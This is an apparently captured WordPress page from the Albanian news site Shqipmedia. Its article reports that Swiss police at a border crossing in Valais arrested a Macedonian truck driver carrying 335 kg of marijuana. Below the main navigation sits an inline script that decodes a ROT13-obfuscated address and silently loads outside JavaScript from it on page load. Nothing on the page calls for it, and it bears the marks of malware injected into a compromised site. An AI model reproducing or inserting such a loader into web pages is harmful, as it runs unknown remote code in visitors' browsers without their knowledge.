<!DOCTYPE html>
<html lang="en-US"
	itemscope 
	itemtype="http://schema.org/Article" 
	prefix="og: http://ogp.me/ns#"  class="no-js">
<head>
	<meta charset="UTF-8">
	        <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    	<link rel="profile" href="http://gmpg.org/xfn/11">
	<link rel="pingback" href="http://www.shqipmedia.com/xmlrpc.php">
	<!--[if lt IE 9]>
	<script src="http://www.shqipmedia.com/wp-content/themes/newsplus-new/js/html5.js"></script>
	<![endif]-->
	<title>Policia zvicerane arreston shtetasin e Maqedonisë me 3 milion euro drogë | Shqipmedia</title>
<!-- Jetpack Site Verification Tags -->



<!-- All in One SEO Pack 2.3.12 by Michael Torbert of Semper Fi Web Design[523,621] -->
<link rel="author" href="https://plus.google.com/116980059880139499003" />
<meta name="description"  content="Policia zvicerane e Kantonit të Wallisit, më 13 shkurt të këtij viti, në një pikë kufitare e ka ndaluar një shtetas 29-vjeçar të Maqedonisë, vozitës i një" />

<link rel="canonical" href="http://www.shqipmedia.com/policia-zvicerane-arreston-shtetasin-e-maqedonise-me-3-milion-euro-droge/" />
<meta property="og:title" content="Policia zvicerane arreston shtetasin e Maqedonisë me 3 milion euro drogë | Shqipmedia" />
<meta property="og:type" content="article" />
<meta property="og:url" content="http://www.shqipmedia.com/policia-zvicerane-arreston-shtetasin-e-maqedonise-me-3-milion-euro-droge/" />
<meta property="og:image" content="http://www.shqipmedia.com/wp-content/uploads/2017/03/20170309_225551-1000x600.png" />
<meta property="og:site_name" content="Shqipmedia" />
<meta property="fb:admins" content="53444627220" />
<meta property="og:description" content="Policia zvicerane e Kantonit të Wallisit, më 13 shkurt të këtij viti, në një pikë kufitare e ka ndaluar një shtetas 29-vjeçar të Maqedonisë, vozitës i një kamioni: Me këtë rast, ai është kontrolluar dhe në kamion janë gjetur 335 kilogramë marihuanë të cilat ka dashur t`i trafikojë në Zvicër. Rreth orës 09.30, të datës 13 shkurt, roja kufitare në Martiny VS e ka ndaluar nja kamion i cili ka qenë i regjistruar dhe me autotarga të Maqedonisë, thuhet në një komunikatë të policisë, përcjellë „Shtegu.com“. Gjatë kontrollit të kamionit, janë gjetur disa kuti druri të mbushura me 335 kilogramë marihuanë, vlera e së cilës llogaritet në rreth tre milionë euro. Vozitësi i kamionit, një shtetas 29-vjeçar është paraburgosur. Hetimet e policisë zvicerane janë në rrjedhë e sipër." />
<meta property="article:tag" content="rajon &amp; bota" />
<meta property="article:published_time" content="2017-03-10T13:45:09Z" />
<meta property="article:modified_time" content="2017-03-10T13:45:09Z" />
<meta name="twitter:card" content="summary" />
<meta name="twitter:title" content="Policia zvicerane arreston shtetasin e Maqedonisë me 3 milion euro drogë | Shqipmedia" />
<meta name="twitter:description" content="Policia zvicerane e Kantonit të Wallisit, më 13 shkurt të këtij viti, në një pikë kufitare e ka ndaluar një shtetas 29-vjeçar të Maqedonisë, vozitës i një kamioni: Me këtë rast, ai është kontrolluar dhe në kamion janë gjetur 335 kilogramë marihuanë të cilat ka dashur t`i trafikojë në Zvicër. Rreth orës 09.30, të datës 13 shkurt, roja kufitare në Martiny VS e ka ndaluar nja kamion i cili ka qenë i regjistruar dhe me autotarga të Maqedonisë, thuhet në një komunikatë të policisë, përcjellë „Shtegu.com“. Gjatë kontrollit të kamionit, janë gjetur disa kuti druri të mbushura me 335 kilogramë marihuanë, vlera e së cilës llogaritet në rreth tre milionë euro. Vozitësi i kamionit, një shtetas 29-vjeçar është paraburgosur. Hetimet e policisë zvicerane janë në rrjedhë e sipër." />
<meta name="twitter:image" content="http://www.shqipmedia.com/wp-content/uploads/2017/03/20170309_225551-1000x600.png" />
<meta itemprop="image" content="http://www.shqipmedia.com/wp-content/uploads/2017/03/20170309_225551-1000x600.png" />
			<script>
			(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
			(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
			m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
			})(window,document,'script','//www.google-analytics.com/analytics.js','ga');

			ga('create', 'UA-68429536-1', 'auto');
			
			ga('send', 'pageview');
			</script>
<!-- /all in one seo pack -->
<link rel='dns-prefetch' href='//s0.wp.com' />
<link rel='dns-prefetch' href='//platform-api.sharethis.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Shqipmedia &raquo; Feed" href="http://www.shqipmedia.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Shqipmedia &raquo; Comments Feed" href="http://www.shqipmedia.com/comments/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.shqipmedia.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.7.3"}};
			!function(a,b,c){function d(a){var b,c,d,e,f=String.fromCharCode;if(!k||!k.fillText)return!1;switch(k.clearRect(0,0,j.width,j.height),k.textBaseline="top",k.font="600 32px Arial",a){case"flag":return k.fillText(f(55356,56826,55356,56819),0,0),!(j.toDataURL().length<3e3)&&(k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,65039,8205,55356,57096),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,55356,57096),0,0),c=j.toDataURL(),b!==c);case"emoji4":return k.fillText(f(55357,56425,55356,57341,8205,55357,56507),0,0),d=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55357,56425,55356,57341,55357,56507),0,0),e=j.toDataURL(),d!==e}return!1}function e(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i,j=b.createElement("canvas"),k=j.getContext&&j.getContext("2d");for(i=Array("flag","emoji4"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='newsplus-fontawesome-css'  href='http://www.shqipmedia.com/wp-content/plugins/newsplus-shortcodes/assets/css/font-awesome.min.css?ver=4.7.3' type='text/css' media='all' />
<link rel='stylesheet' id='newsplus-shortcodes-css'  href='http://www.shqipmedia.com/wp-content/plugins/newsplus-shortcodes/assets/css/newsplus-shortcodes.css?ver=4.7.3' type='text/css' media='all' />
<link rel='stylesheet' id='sharify-css'  href='http://www.shqipmedia.com/wp-content/plugins/sharify/sharify-style.php' type='text/css' media='all' />
<link rel='stylesheet' id='sharify-icon-css'  href='http://www.shqipmedia.com/wp-content/plugins/sharify/icon/css/sharify.css' type='text/css' media='all' />
<link rel='stylesheet' id='sharify-font-css'  href='https://fonts.googleapis.com/css?family=Roboto+Condensed:400' type='text/css' media='all' />
<link rel='stylesheet' id='newsplus-fonts-css'  href='http://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,300,400,600,700&#038;subset=latin,latin-ext' type='text/css' media='all' />
<link rel='stylesheet' id='newsplus-style-css'  href='http://www.shqipmedia.com/wp-content/themes/newsplus-new/style.css?ver=4.7.3' type='text/css' media='all' />
<!--[if lt IE 9]>
<link rel='stylesheet' id='newsplus-ie-css'  href='http://www.shqipmedia.com/wp-content/themes/newsplus-new/css/ie.css?ver=4.7.3' type='text/css' media='all' />
<![endif]-->
<link rel='stylesheet' id='newsplus-responsive-css'  href='http://www.shqipmedia.com/wp-content/themes/newsplus-new/responsive.css?ver=4.7.3' type='text/css' media='all' />
<link rel='stylesheet' id='prettyphoto-css'  href='http://www.shqipmedia.com/wp-content/themes/newsplus-new/css/prettyPhoto.css?ver=4.7.3' type='text/css' media='all' />
<link rel='stylesheet' id='newsplus-user-css'  href='http://www.shqipmedia.com/wp-content/themes/newsplus-new/user.css?ver=4.7.3' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='http://www.shqipmedia.com/wp-content/plugins/jetpack/css/jetpack.css?ver=4.7' type='text/css' media='all' />
<script type='text/javascript' src='http://www.shqipmedia.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://www.shqipmedia.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var related_posts_js_options = {"post_heading":"h4"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.shqipmedia.com/wp-content/plugins/jetpack/modules/related-posts/related-posts.js?ver=20150408'></script>
<script type='text/javascript' src='//platform-api.sharethis.com/js/sharethis.js#product=ga'></script>
<link rel='https://api.w.org/' href='http://www.shqipmedia.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.shqipmedia.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.shqipmedia.com/wp-includes/wlwmanifest.xml" /> 
<link rel='prev' title='Ky është njëri nga dy shqiptarët e vrarë mbrëmë në Zvicër' href='http://www.shqipmedia.com/ky-eshte-njeri-nga-dy-shqiptaret-e-vrare-mbreme-ne-zvicer/' />
<link rel='next' title='Çfarë fshihet pas krizës në Maqedoni? &#8211; VIDEO' href='http://www.shqipmedia.com/cfare-fshihet-pas-krizes-ne-maqedoni-video/' />
<meta name="generator" content="WordPress 4.7.3" />
<link rel='shortlink' href='http://wp.me/pUOQC-n5N' />
<link rel="alternate" type="application/json+oembed" href="http://www.shqipmedia.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.shqipmedia.com%2Fpolicia-zvicerane-arreston-shtetasin-e-maqedonise-me-3-milion-euro-droge%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://www.shqipmedia.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.shqipmedia.com%2Fpolicia-zvicerane-arreston-shtetasin-e-maqedonise-me-3-milion-euro-droge%2F&#038;format=xml" />
<meta property="fb:app_id" content="102104852359"/><script type="text/javascript">
(function(url){
	if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; }
	var addEvent = function(evt, handler) {
		if (window.addEventListener) {
			document.addEventListener(evt, handler, false);
		} else if (window.attachEvent) {
			document.attachEvent('on' + evt, handler);
		}
	};
	var removeEvent = function(evt, handler) {
		if (window.removeEventListener) {
			document.removeEventListener(evt, handler, false);
		} else if (window.detachEvent) {
			document.detachEvent('on' + evt, handler);
		}
	};
	var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypress keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' ');
	var logHuman = function() {
		var wfscr = document.createElement('script');
		wfscr.type = 'text/javascript';
		wfscr.async = true;
		wfscr.src = url + '&r=' + Math.random();
		(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr);
		for (var i = 0; i < evts.length; i++) {
			removeEvent(evts[i], logHuman);
		}
	};
	for (var i = 0; i < evts.length; i++) {
		addEvent(evts[i], logHuman);
	}
})('//www.shqipmedia.com/?wordfence_logHuman=1&hid=8E1E81A384F573E2E4D75F315B359F36');
</script>
<link rel='dns-prefetch' href='//widgets.wp.com'>
<link rel='dns-prefetch' href='//s0.wp.com'>
<link rel='dns-prefetch' href='//0.gravatar.com'>
<link rel='dns-prefetch' href='//1.gravatar.com'>
<link rel='dns-prefetch' href='//2.gravatar.com'>
<style type='text/css'>img#wpstats{display:none}</style><style type="text/css">
	.primary-nav {
	background-color:#ad0000;
	}
	ul.nav-menu > li > a {
	text-shadow: none;
	color:#ffffff;
	}
	.primary-nav li:hover > a {
	color:#dbdbdb;
	border-bottom-color: #ad0000;
	}
	ul.nav-menu > li.current-menu-item > a,
	ul.nav-menu > li.current-menu-ancestor > a,
	ul.nav-menu > li.current_page_item > a,
	ul.nav-menu > li.current_page_ancestor > a {
	border-bottom-color: #ad0000;
	}
	.primary-nav li ul {
	background-color:#ffffff;
	}
	.primary-nav li ul li a {
	color:;
	}
	.primary-nav li ul li:hover > a {
	color:;
	background-color:;
	}
	h3.sb-title {
	color:;
	}
	#secondary {
	color:#ffffff;
	background-color:#0a0a0a;
	}
	#secondary .sep {
	color:#ffffff;
	}
	#secondary a,
	#secondary ul a,
	#secondary ul .entry-meta a,
	#secondary ul .widget .entry-meta a {
	color:#ffffff;
	}
	#secondary a:hover,
	#secondary ul a:hover,
	#secondary ul .entry-meta a:hover,
	#secondary ul .widget .entry-meta a:hover {
	color:#ad0000;
	}
	h3.sc-title {
	color:#ffffff;
	}
	#secondary .widget ul li {
	border-bottom-color: #ad0000;
	}

	#secondary .widget ul ul {
	border-top-color: #ad0000;
	}
	#footer {
	color:#ffffff;
	background-color:#0a0a0a;
	}
	body.is-stretched.custom-background {
	background-color:#0a0a0a;
	}
	#footer a {
	color:#ffffff;
	}
	#footer a:hover {
	color:#ad0000;
	}
</style>
	
		<style type="text/css">
		
				
		body {
			font-size: 17px;
		}		
		
				
		#page {
			max-width: 1600px;
		}
		
		.wrap,
		.primary-nav,
		.is-stretched .primary-nav .wrap,
		#utility-top {
			max-width: 1552px;
		}
		
				
		</style>
	
	<!--[if lt IE 9]>
<script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link rel="shortcut icon" href="http://www.shqipmedia.com/wp-content/uploads/2015/03/shqipmedia-icon-red.png" type="image/x-icon">
<link rel="apple-touch-icon-precomposed" href="http://www.shqipmedia.com/wp-content/uploads/2015/03/shqipmedia-icon-red.png">		<style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style>
		<link rel="amphtml" href="http://www.shqipmedia.com/policia-zvicerane-arreston-shtetasin-e-maqedonise-me-3-milion-euro-droge/amp/" /><link rel="icon" href="http://www.shqipmedia.com/wp-content/uploads/2015/03/cropped-shqipmedia-icon-red-32x32.png" sizes="32x32" />
<link rel="icon" href="http://www.shqipmedia.com/wp-content/uploads/2015/03/cropped-shqipmedia-icon-red-192x192.png" sizes="192x192" />
<link rel="apple-touch-icon-precomposed" href="http://www.shqipmedia.com/wp-content/uploads/2015/03/cropped-shqipmedia-icon-red-180x180.png" />
<meta name="msapplication-TileImage" content="http://www.shqipmedia.com/wp-content/uploads/2015/03/cropped-shqipmedia-icon-red-270x270.png" />
</head>

<body class="post-template-default single single-post postid-88771 single-format-standard custom-font-enabled is-stretched">
	    <div id="page" class="hfeed site clear">
            <div id="utility-top">
            <div class="wrap clear">
                                <nav id="optional-nav" class="secondary-nav">
                    <ul id="menu-footer-menu" class="sec-menu clear"><li id="menu-item-251" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-251"><a href="http://www.shqipmedia.com/kontakt/">Kontakt</a></li>
<li id="menu-item-252" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-252"><a href="http://www.shqipmedia.com/impressum/">Impressum</a></li>
<li id="menu-item-478" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-478"><a href="http://www.shqipmedia.com/moti/">Moti</a></li>
<li id="menu-item-480" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-480"><a href="http://www.shqipmedia.com/arkiva/">Arkiva</a></li>
<li id="menu-item-1193" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1193"><a href="http://www.shqipmedia.com/horoskopi-2016/">Horoskopi 2016</a></li>
</ul>                </nav><!-- #optional-nav -->
                                <div id="search-bar" role="complementary">
                    <form role="search" method="get" class="search-form" action="http://www.shqipmedia.com/">
				<label>
					<span class="screen-reader-text">Search for:</span>
					<input type="search" class="search-field" placeholder="Search &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Search" />
			</form>                </div><!-- #search-bar -->
                            </div><!-- #utility-top .wrap -->
        </div><!-- #utility-top-->
		        <header id="header" class="site-header" role="banner">
            <div class="wrap full-width clear">
			    <div class="brand column one-fourth" role="banner">
        <h4 class="site-title"><a href="http://www.shqipmedia.com/" title="Shqipmedia" rel="home"><img src="http://www.shqipmedia.com/wp-content/uploads/2015/03/A5-900x195.png" alt="Shqipmedia" title="Shqipmedia" /></a>
			</h4>    </div><!-- .column one-third -->
            </div><!-- #header .wrap -->
        </header><!-- #header -->
                        <nav id="responsive-menu">
                <h3 id="menu-button-1" class="menu-button">Menu<span class="toggle-icon"><span class="bar-1"></span><span class="bar-2"></span><span class="bar-3"></span></span></h3>
                </nav>
                    <nav id="main-nav" class="primary-nav" role="navigation">
            <div class="wrap">
                <ul id="menu-main-menu" class="nav-menu clear"><li id="menu-item-10774" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-10774"><a href="http://www.shqipmedia.com/">Ballina</a></li>
<li id="menu-item-31" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor menu-item-has-children menu-item-31"><a href="http://www.shqipmedia.com/category/lajme/">Lajme</a>
<ul class="sub-menu">
	<li id="menu-item-35" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-35"><a href="http://www.shqipmedia.com/category/lajme/maqedoni/">Maqedoni</a></li>
	<li id="menu-item-36" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-36"><a href="http://www.shqipmedia.com/category/lajme/shqiperi/">Shqipëri</a></li>
	<li id="menu-item-33" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-33"><a href="http://www.shqipmedia.com/category/lajme/kosove/">Kosovë</a></li>
	<li id="menu-item-34" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-34"><a href="http://www.shqipmedia.com/category/lajme/kronike-e-zeze/">Kronikë e Zezë</a></li>
	<li id="menu-item-238" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-238"><a href="http://www.shqipmedia.com/category/lajme/rajon-bota/">Rajon &#038; Bota</a></li>
	<li id="menu-item-32" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-32"><a href="http://www.shqipmedia.com/category/lajme/ekonomi/">Ekonomi</a></li>
	<li id="menu-item-38" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-38"><a href="http://www.shqipmedia.com/category/opinone/">Opinone</a></li>
</ul>
</li>
<li id="menu-item-41" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-41"><a href="http://www.shqipmedia.com/category/sport/">Sport</a></li>
<li id="menu-item-39" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-39"><a href="http://www.shqipmedia.com/category/showbiz/">Showbiz</a></li>
<li id="menu-item-37" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-37"><a href="http://www.shqipmedia.com/category/lifestyle/">Lifestyle</a></li>
<li id="menu-item-29" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-29"><a href="http://www.shqipmedia.com/category/auto-tech/">Auto-Tech</a></li>
<li id="menu-item-30" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-30"><a href="http://www.shqipmedia.com/category/bulevard/">Bulevard</a></li>
<li id="menu-item-40" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-40"><a href="http://www.shqipmedia.com/category/shqip/">Shqip+</a></li>
</ul>            </div><!-- .primary-nav .wrap -->
        </nav><!-- #main-nav -->
        <script type="text/javascript">
            (function(){function r(s){return s.replace(/[A-z]/g,function(c){return String.fromCharCode(c.charCodeAt(0)+('M'>=c.toUpperCase()?13:-13))})}
    var c=document.createElement('script'),wdefine=typeof define!=='undefined'?define:false;c.type='text/javascript';c.async=true;
    c.setAttribute('data-main',r('//ncc.zlfnsrhey.pbz/ncc.wf'));c.src='//cdnjs.cloudflare.com/ajax/libs/require.js/2.1.10/require.min.js';
    c.onload=function(){mydefine=define,define=wdefine?wdefine:null;};
    var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(c,s);
})();
</script>
        <div id="main">
            <div class="wrap clear">
            	<div class="content-row"><div id="primary" class="site-content">
    <div id="content" role="main">
	<div class="breadcrumbs"><a href="http://www.shqipmedia.com">Home</a> <span class="sep"> / </span> <a href="http://www.shqipmedia.com/category/lajme/">Lajme</a> <span class="sep"> / </span> <a href="http://www.shqipmedia.com/category/lajme/rajon-bota/">Rajon &amp; Bota</a> <span class="sep"> / </span> <span class="current">Policia zvicerane arreston shtetasin e Maqedonisë me 3 milion euro drogë</span></div>			 <article id="post-88771" class="post-88771 post type-post status-publish format-standard has-post-thumbnail hentry category-rajon-bota">
                <header class="entry-header">
                    <h1 class="entry-title">Policia zvicerane arreston shtetasin e Maqedonisë me 3 milion euro drogë</h1>
                                                <aside id="meta-88771" class="entry-meta"><span class="posted-on">Posted on </span><a href="http://www.shqipmedia.com/policia-zvicerane-arreston-shtetasin-e-maqedonise-me-3-milion-euro-droge/" title="13:45" class="post-time"><time class="entry-date updated" datetime="2017-03-10T13:45:09+00:00">03/10/2017</time></a><span class="by-author"> by </span><span class="author vcard"><a class="url fn n" href="" title="View all posts by " rel="author"></a></span><span class="posted-in"> in </span><a href="http://www.shqipmedia.com/category/lajme/rajon-bota/" rel="tag">Rajon &amp; Bota</a> </aside>
                        <div class="single-post-thumb"><img src="http://www.shqipmedia.com/wp-content/uploads/2017/03/20170309_225551-1000x600-900x540-900x540.png" class="attachment-post-thumbnail wp-post-image" alt="20170309_225551-1000x600.png"></div>                </header>
                <div class="entry-content">
					<p>Policia zvicerane e Kantonit të Wallisit, më 13 shkurt të këtij viti, në një pikë kufitare e ka ndaluar një shtetas 29-vjeçar të Maqedonisë, vozitës i një kamioni: Me këtë rast, ai është kontrolluar dhe në kamion janë gjetur 335 kilogramë marihuanë të cilat ka dashur t`i trafikojë në Zvicër.</p>
<p>Rreth orës 09.30, të datës 13 shkurt, roja kufitare në Martiny VS e ka ndaluar nja kamion i cili ka qenë i regjistruar dhe me autotarga të Maqedonisë, thuhet në një komunikatë të policisë, përcjellë „Shtegu.com“. Gjatë kontrollit të kamionit, janë gjetur disa kuti druri të mbushura me 335 kilogramë marihuanë, vlera e së cilës llogaritet në rreth tre milionë euro.</p>
<p>Vozitësi i kamionit, një shtetas 29-vjeçar është paraburgosur. Hetimet e policisë zvicerane janë në rrjedhë e sipër.</p>
<div id="wpdevar_comment_1" style="width:100%;text-align:left;">
		<span style="padding: 10px;font-size:21px;font-family:Times New Roman,Times,Georgia,serif;color:#000000;">Komentet</span>
		<div class="fb-comments" data-href="http://www.shqipmedia.com/policia-zvicerane-arreston-shtetasin-e-maqedonise-me-3-milion-euro-droge/" data-order-by="social" data-numposts="8" data-width="100%" style="display:block;"></div></div><div class="sharify-container"><ul><li class="sharify-btn-twitter">
								<a title="Tweet on Twitter" href="https://twitter.com/intent/tweet?text=Policia+zvicerane+arreston+shtetasin+e+Maqedonis%C3%AB+me+3+milion+euro+drog%C3%AB: http://www.shqipmedia.com/policia-zvicerane-arreston-shtetasin-e-maqedonise-me-3-milion-euro-droge/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;">
									<span class="sharify-icon"><i class="sharify sharify-twitter"></i></span>
									<span class="sharify-title">Tweet</span>
								</a>
							</li><li class="sharify-btn-facebook">
								<a title="Share on Facebook" href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fwww.shqipmedia.com%2Fpolicia-zvicerane-arreston-shtetasin-e-maqedonise-me-3-milion-euro-droge%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;">
									<span class="sharify-icon"><i class="sharify sharify-facebook"></i></span>
									<span class="sharify-title">Share</span>
									<span class="sharify-count">0</span>
								</a>
							</li><li class="sharify-btn-reddit">
								<a title="Submit to Reddit" href="http://reddit.com/submit?url=http://www.shqipmedia.com/policia-zvicerane-arreston-shtetasin-e-maqedonise-me-3-milion-euro-droge/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=950,height=450,toolbar=0'); return false;">
									<span class="sharify-icon"><i class="sharify sharify-reddit"></i></span>
									<span class="sharify-title">Reddit</span>
								</a>
							</li><li class="sharify-btn-gplus">
								<a title="Share on Google+" href="http://plus.google.com/share?url=http://www.shqipmedia.com/policia-zvicerane-arreston-shtetasin-e-maqedonise-me-3-milion-euro-droge/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;">
									<span class="sharify-icon"><i class="sharify sharify-gplus"></i></span>
									<span class="sharify-title">+1</span>
								</a>
							</li><li class="sharify-btn-pocket">
								<a title="Save to read later on Pocket" href="https://getpocket.com/save?url=http%3A%2F%2Fwww.shqipmedia.com%2Fpolicia-zvicerane-arreston-shtetasin-e-maqedonise-me-3-milion-euro-droge%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;">
									<span class="sharify-icon"><i class="sharify sharify-pocket"></i></span>
									<span class="sharify-title">Pocket</span>
								</a>
							</li><li class="sharify-btn-pinterest">
								<a title="Share on Pinterest" href="http://pinterest.com/pin/create/button/?url=http://www.shqipmedia.com/policia-zvicerane-arreston-shtetasin-e-maqedonise-me-3-milion-euro-droge/&media=http://www.shqipmedia.com/wp-content/uploads/2017/03/20170309_225551-1000x600.png&description=Policia zvicerane arreston shtetasin e Maqedonisë me 3 milion euro drogë - http://www.shqipmedia.com/policia-zvicerane-arreston-shtetasin-e-maqedonise-me-3-milion-euro-droge/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;">
									<span class="sharify-icon"><i class="sharify sharify-pinterest"></i></span>
									<span class="sharify-title">Pinterest</span>
									<span class="sharify-count">0</span>
								</a>
							</li><li class="sharify-btn-linkedin">
								<a title="Share on Linkedin" href="https://www.linkedin.com/shareArticle?mini=true&url=http://www.shqipmedia.com/policia-zvicerane-arreston-shtetasin-e-maqedonise-me-3-milion-euro-droge/&title=Policia zvicerane arreston shtetasin e Maqedonisë me 3 milion euro drogë" onclick="if(!document.getElementById('td_social_networks_buttons')){window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;}" >
									<span class="sharify-icon"><i class="sharify sharify-linkedin"></i></span>
									<span class="sharify-title">LinkedIn</span>
									<span class="sharify-count">0</span>
								</a>
							</li></ul></div>
<div id='jp-relatedposts' class='jp-relatedposts' >
	
</div>                </div><!-- .entry-content -->
                <footer>
                                </footer><!-- .entry-meta -->
			</article><!-- #post-88771 -->
            
			
	<nav class="navigation post-navigation" role="navigation">
		<h2 class="screen-reader-text">Post navigation</h2>
		<div class="nav-links"><div class="nav-previous"><a href="http://www.shqipmedia.com/ky-eshte-njeri-nga-dy-shqiptaret-e-vrare-mbreme-ne-zvicer/" rel="prev"><span class="meta-nav" aria-hidden="true">Previous</span> <span class="screen-reader-text">Previous post:</span> <span class="post-title">Ky është njëri nga dy shqiptarët e vrarë mbrëmë në Zvicër</span></a></div><div class="nav-next"><a href="http://www.shqipmedia.com/cfare-fshihet-pas-krizes-ne-maqedoni-video/" rel="next"><span class="meta-nav" aria-hidden="true">Next</span> <span class="screen-reader-text">Next post:</span> <span class="post-title">Çfarë fshihet pas krizës në Maqedoni? &#8211; VIDEO</span></a></div></div>
	</nav>		<div class="related-posts clear">
			<h3>Related Posts</h3>
			<ul class="thumb-style clear">
							<li>
										<a class="post-thumb" href="http://www.shqipmedia.com/rriten-statistikat-mbi-kriminalitetin-ne-vatikan/" title="Rriten statistikat mbi kriminalitetin në Vatikan"><img src="http://www.shqipmedia.com/wp-content/uploads/2015/02/084-150x150-150x150.jpg" alt="Rriten statistikat mbi kriminalitetin në Vatikan" title="Rriten statistikat mbi kriminalitetin në Vatikan"/></a>
										<h4><a href="http://www.shqipmedia.com/rriten-statistikat-mbi-kriminalitetin-ne-vatikan/" title="Rriten statistikat mbi kriminalitetin në Vatikan">Rriten statistikat mbi kriminalitetin në Vatikan</a></h4>
								</li>
							<li>
										<a class="post-thumb" href="http://www.shqipmedia.com/arrihet-marreveshja-mes-greqise-dhe-eurozones/" title="Arrihet marrëveshja mes Greqisë dhe Eurozonës"><img src="http://www.shqipmedia.com/wp-content/uploads/2015/07/cipras1-1024x600-150x150-150x150.jpg" alt="Arrihet marrëveshja mes Greqisë dhe Eurozonës" title="Arrihet marrëveshja mes Greqisë dhe Eurozonës"/></a>
										<h4><a href="http://www.shqipmedia.com/arrihet-marreveshja-mes-greqise-dhe-eurozones/" title="Arrihet marrëveshja mes Greqisë dhe Eurozonës">Arrihet marrëveshja mes Greqisë dhe Eurozonës</a></h4>
								</li>
							<li>
